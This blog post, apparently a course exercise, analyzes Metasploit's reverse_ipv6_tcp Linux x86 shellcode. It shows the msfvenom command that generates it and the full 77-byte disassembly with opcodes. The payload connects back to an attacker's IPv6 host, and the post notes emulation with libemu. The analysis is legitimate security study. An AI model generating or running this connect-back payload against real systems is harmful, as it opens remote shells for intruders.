Tuesday, March 8, 2016

5.2 - Analyzing Reverse IPv6 TCP


- The shellcode analyzed in this excersise is reverse_ipv6_tcp, which purpose is to spawn a command shell and connect back to the attacker over IPv6 protocol.

- First, the ndisasm command disassembles the payload outputting the corresponding assembly language instructions and its opcodes:

root@kali:~# msfvenom -p linux/x86/shell/reverse_ipv6_tcp R |ndisasm -u -

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 77 bytes

00000000  31DB              xor ebx,ebx
00000002  53                push ebx
00000003  43                inc ebx
00000004  53                push ebx
00000005  6A0A              push byte +0xa
00000007  89E1              mov ecx,esp
00000009  6A66              push byte +0x66
0000000B  58                pop eax
0000000C  CD80              int 0x80
0000000E  96                xchg eax,esi
0000000F  99                cdq
00000010  6800000000        push dword 0x0
00000015  68C0A8010C        push dword 0xc01a8c0
0000001A  6800005EFE        push dword 0xfe5e0000
0000001F  6800000000        push dword 0x0
00000024  68FE800000        push dword 0x80fe
00000029  52                push edx
0000002A  6668115C          push word 0x5c11
0000002E  66680A00          push word 0xa
00000032  89E1              mov ecx,esp
00000034  6A1C              push byte +0x1c
00000036  51                push ecx
00000037  56                push esi
00000038  89E1              mov ecx,esp
0000003A  43                inc ebx
0000003B  43                inc ebx
0000003C  6A66              push byte +0x66
0000003E  58                pop eax
0000003F  CD80              int 0x80
00000041  89F3              mov ebx,esi
00000043  B60C              mov dh,0xc
00000045  B003              mov al,0x3
00000047  CD80              int 0x80
00000049  89DF              mov edi,ebx
0000004B  FFE1              jmp ecx

- Launching the sctest command from libemu tools the emulation begins, and finally two syscalls, socket() and connect() are displayed:

- The image is converted into reverse_ipv6.png:

- reverse_ipv6.png displays the phases of the shellcode, and the syscalls socket() and connect():